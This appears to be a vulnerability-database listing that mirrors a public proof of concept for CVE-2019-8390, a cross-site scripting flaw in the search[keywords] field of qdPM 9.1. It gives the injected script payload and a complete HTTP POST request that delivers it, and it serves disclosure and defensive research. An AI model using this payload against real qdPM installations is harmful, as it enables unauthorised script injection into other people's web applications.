Lucene search
K

qdPM 9.1 - search[keywords] Cross-Site Scripting

🗓️ 18 Feb 2019 00:00:00Reported by Mehmet EMIROGLUType 
exploitpack
 exploitpack
👁 26 Views

qdPM 9.1 'search[keywords]' XSS Injection on Free Project Management Too

Related
Code
ReporterTitlePublishedViews
Family
0day.today
qdPM 9.1 - search[keywords] Cross-Site Scripting Vulnerability
18 Feb 201900:00
zdt
CVE
CVE-2019-8390
14 May 201914:57
cve
Cvelist
CVE-2019-8390
14 May 201914:57
cvelist
Exploit DB
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting
18 Feb 201900:00
exploitdb
EUVD
EUVD-2019-17780
7 Oct 202500:30
euvd
Nuclei
qdPM 9.1 - Cross-site Scripting
3 Jul 202603:01
nuclei
NVD
CVE-2019-8390
14 May 201915:29
nvd
OSV
CVE-2019-8390
14 May 201915:29
osv
Packet Storm
qdPM 9.1 Cross Site Scripting
18 Feb 201900:00
packetstorm
Prion
Cross site scripting
14 May 201915:29
prion
Rows per page
===========================================================================================
# Exploit Title: qdPM 9.1 - 'search[keywords]' XSS Injection
# CVE: CVE-2019-8390
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
  Free project management tool for small team
  qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
  It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
  using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : search[keywords]
# Attack Pattern : e"><script>zi2u(9111)</script>
# POST Request : http://localhost/qdpm/index.php/configuration
===========================================================================================
POST /qdpm/index.php/users HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.08864
26